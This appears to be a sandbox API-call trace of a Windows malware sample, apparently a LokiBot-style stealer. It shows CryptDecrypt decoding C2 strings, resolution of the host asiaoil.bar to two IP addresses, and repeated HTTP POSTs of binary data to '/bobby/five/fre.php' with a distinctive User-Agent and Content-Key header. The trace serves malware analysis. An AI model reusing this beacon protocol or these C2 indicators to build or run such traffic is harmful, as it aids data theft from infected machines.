GetProcessHeap () returned 0x740000 [0315.522] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75cdd0 [0315.522] GetProcessHeap () returned 0x740000 [0315.522] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0315.523] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0315.524] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0315.524] GetProcessHeap () returned 0x740000 [0315.524] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0315.524] GetProcessHeap () returned 0x740000 [0315.525] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0315.525] GetProcessHeap () returned 0x740000 [0315.525] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763e00 [0315.525] GetProcessHeap () returned 0x740000 [0315.525] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0315.526] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0315.526] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0315.526] GetProcessHeap () returned 0x740000 [0315.526] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0315.527] GetProcessHeap () returned 0x740000 [0315.527] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0315.527] send (s=0x314, buf=0x747928*, len=243, flags=0) returned 243 [0315.528] send (s=0x314, buf=0x761fd0*, len=159, flags=0) returned 159 [0315.528] GetProcessHeap () returned 0x740000 [0315.528] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0315.528] recv (in: s=0x314, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 571 [0315.613] GetProcessHeap () returned 0x740000 [0315.614] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0315.614] GetProcessHeap () returned 0x740000 [0315.614] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763e00 | out: hHeap=0x740000) returned 1 [0315.614] GetProcessHeap () returned 0x740000 [0315.614] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0315.614] GetProcessHeap () returned 0x740000 [0315.615] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75cdd0 | out: hHeap=0x740000) returned 1 [0315.615] closesocket (s=0x314) returned 0 [0315.617] GetProcessHeap () returned 0x740000 [0315.617] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b640 | out: hHeap=0x740000) returned 1 [0315.617] GetProcessHeap () returned 0x740000 [0315.618] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767278 | out: hHeap=0x740000) returned 1 [0315.618] GetProcessHeap () returned 0x740000 [0315.618] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763668 | out: hHeap=0x740000) returned 1 [0315.618] GetProcessHeap () returned 0x740000 [0315.618] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0315.619] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x958) returned 0x314 [0315.621] Sleep (dwMilliseconds=0xea60) [0315.622] GetProcessHeap () returned 0x740000 [0315.622] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763668 [0315.623] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.624] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0315.632] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.632] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75ce58) returned 1 [0315.642] GetProcessHeap () returned 0x740000 [0315.642] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758478 [0315.643] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.644] CryptImportKey (in: hProv=0x75ce58, pbData=0x758478, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0315.644] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.691] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0315.692] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.692] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0315.692] GetProcessHeap () returned 0x740000 [0315.693] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758478 | out: hHeap=0x740000) returned 1 [0315.693] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.693] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763668, pdwDataLen=0x19fcfc | out: pbData=0x763668, pdwDataLen=0x19fcfc) returned 1 [0315.694] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.694] CryptDestroyKey (hKey=0x74d768) returned 1 [0315.695] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.695] CryptReleaseContext (hProv=0x75ce58, dwFlags=0x0) returned 1 [0315.695] GetProcessHeap () returned 0x740000 [0315.695] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765ce8 [0315.696] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0315.696] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0315.697] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0315.697] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0315.697] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0315.698] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0315.699] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0315.699] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0315.699] GetProcessHeap () returned 0x740000 [0315.699] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bf80 [0315.699] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0315.699] GetProcessHeap () returned 0x740000 [0315.699] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bf80 | out: hHeap=0x740000) returned 1 [0315.700] GetProcessHeap () returned 0x740000 [0315.700] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765ce8 | out: hHeap=0x740000) returned 1 [0315.700] GetProcessHeap () returned 0x740000 [0315.700] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763668 | out: hHeap=0x740000) returned 1 [0315.700] GetProcessHeap () returned 0x740000 [0315.700] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763db8 [0315.701] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.701] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0315.706] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.706] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75cdd0) returned 1 [0315.713] GetProcessHeap () returned 0x740000 [0315.714] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758778 [0315.714] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.714] CryptImportKey (in: hProv=0x75cdd0, pbData=0x758778, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0315.715] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.715] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0315.716] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.716] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0315.716] GetProcessHeap () returned 0x740000 [0315.717] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 | out: hHeap=0x740000) returned 1 [0315.718] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.718] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763db8, pdwDataLen=0x19fcfc | out: pbData=0x763db8, pdwDataLen=0x19fcfc) returned 1 [0315.719] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.719] CryptDestroyKey (hKey=0x74d768) returned 1 [0315.720] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.720] CryptReleaseContext (hProv=0x75cdd0, dwFlags=0x0) returned 1 [0315.720] GetProcessHeap () returned 0x740000 [0315.720] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x766588 [0315.721] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0315.721] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0315.722] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0315.722] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0315.722] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0315.723] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0315.723] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0315.724] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0315.724] GetProcessHeap () returned 0x740000 [0315.724] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75be68 [0315.724] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75bf58*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2f8*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c070*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c3b8*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0315.725] GetProcessHeap () returned 0x740000 [0315.725] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b6a0 [0315.725] socket (af=2, type=1, protocol=6) returned 0x318 [0315.725] connect (s=0x318, name=0x75c2f8*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0315.744] FreeAddrInfoW (pAddrInfo=0x75bf58*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2f8*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c070*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c3b8*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0315.744] GetProcessHeap () returned 0x740000 [0315.744] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75d8f8 [0315.744] GetProcessHeap () returned 0x740000 [0315.744] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0315.745] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0315.746] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0315.746] GetProcessHeap () returned 0x740000 [0315.746] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0315.746] GetProcessHeap () returned 0x740000 [0315.746] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0315.746] GetProcessHeap () returned 0x740000 [0315.746] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763c98 [0315.747] GetProcessHeap () returned 0x740000 [0315.747] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0315.747] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0315.748] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0315.748] GetProcessHeap () returned 0x740000 [0315.749] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0315.749] GetProcessHeap () returned 0x740000 [0315.749] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0315.749] send (s=0x318, buf=0x747928*, len=243, flags=0) returned 243 [0315.749] send (s=0x318, buf=0x761fd0*, len=159, flags=0) returned 159 [0315.750] GetProcessHeap () returned 0x740000 [0315.750] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0315.750] recv (in: s=0x318, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 565 [0315.852] GetProcessHeap () returned 0x740000 [0315.852] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0315.852] GetProcessHeap () returned 0x740000 [0315.853] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763c98 | out: hHeap=0x740000) returned 1 [0315.853] GetProcessHeap () returned 0x740000 [0315.853] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0315.853] GetProcessHeap () returned 0x740000 [0315.853] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75d8f8 | out: hHeap=0x740000) returned 1 [0315.853] closesocket (s=0x318) returned 0 [0315.855] GetProcessHeap () returned 0x740000 [0315.855] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6a0 | out: hHeap=0x740000) returned 1 [0315.855] GetProcessHeap () returned 0x740000 [0315.856] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x766588 | out: hHeap=0x740000) returned 1 [0315.856] GetProcessHeap () returned 0x740000 [0315.856] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763db8 | out: hHeap=0x740000) returned 1 [0315.856] GetProcessHeap () returned 0x740000 [0315.856] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75be68 | out: hHeap=0x740000) returned 1 [0315.857] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x8c4) returned 0x318 [0315.858] Sleep (dwMilliseconds=0xea60) [0315.860] GetProcessHeap () returned 0x740000 [0315.860] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763b30 [0315.860] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.861] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0315.868] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.868] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75caa0) returned 1 [0315.876] GetProcessHeap () returned 0x740000 [0315.876] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758778 [0315.877] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.877] CryptImportKey (in: hProv=0x75caa0, pbData=0x758778, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d9e8) returned 1 [0315.878] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.878] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0315.879] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.933] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0315.933] GetProcessHeap () returned 0x740000 [0315.933] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 | out: hHeap=0x740000) returned 1 [0315.934] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.935] CryptDecrypt (in: hKey=0x74d9e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763b30, pdwDataLen=0x19fcfc | out: pbData=0x763b30, pdwDataLen=0x19fcfc) returned 1 [0315.936] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.936] CryptDestroyKey (hKey=0x74d9e8) returned 1 [0315.936] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.937] CryptReleaseContext (hProv=0x75caa0, dwFlags=0x0) returned 1 [0315.937] GetProcessHeap () returned 0x740000 [0315.937] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x766138 [0315.937] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0315.938] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0315.938] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0315.939] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0315.939] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0315.940] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0315.940] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0315.941] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0315.941] GetProcessHeap () returned 0x740000 [0315.941] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bdc8 [0315.941] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0315.941] GetProcessHeap () returned 0x740000 [0315.942] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0315.942] GetProcessHeap () returned 0x740000 [0315.942] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x766138 | out: hHeap=0x740000) returned 1 [0315.942] GetProcessHeap () returned 0x740000 [0315.943] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763b30 | out: hHeap=0x740000) returned 1 [0315.943] GetProcessHeap () returned 0x740000 [0315.943] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763b30 [0315.946] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.948] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0315.955] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.956] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d210) returned 1 [0315.963] GetProcessHeap () returned 0x740000 [0315.963] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x7584a8 [0315.964] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.964] CryptImportKey (in: hProv=0x75d210, pbData=0x7584a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d9e8) returned 1 [0315.965] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0315.965] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0315.966] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.030] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0316.030] GetProcessHeap () returned 0x740000 [0316.030] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7584a8 | out: hHeap=0x740000) returned 1 [0316.031] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.031] CryptDecrypt (in: hKey=0x74d9e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763b30, pdwDataLen=0x19fcfc | out: pbData=0x763b30, pdwDataLen=0x19fcfc) returned 1 [0316.032] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.032] CryptDestroyKey (hKey=0x74d9e8) returned 1 [0316.033] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0316.033] CryptReleaseContext (hProv=0x75d210, dwFlags=0x0) returned 1 [0316.033] GetProcessHeap () returned 0x740000 [0316.033] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765898 [0316.034] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0316.034] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0316.035] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0316.035] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0316.036] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0316.036] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0316.037] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0316.037] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0316.037] GetProcessHeap () returned 0x740000 [0316.037] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bdc8 [0316.037] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75bf30*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2b0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75bdf0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0316.040] GetProcessHeap () returned 0x740000 [0316.040] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b610 [0316.040] socket (af=2, type=1, protocol=6) returned 0x31c [0316.040] connect (s=0x31c, name=0x75c2b0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0316.058] FreeAddrInfoW (pAddrInfo=0x75bf30*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2b0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75bdf0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0316.058] GetProcessHeap () returned 0x740000 [0316.058] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75cee0 [0316.058] GetProcessHeap () returned 0x740000 [0316.058] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0316.059] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0316.060] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | 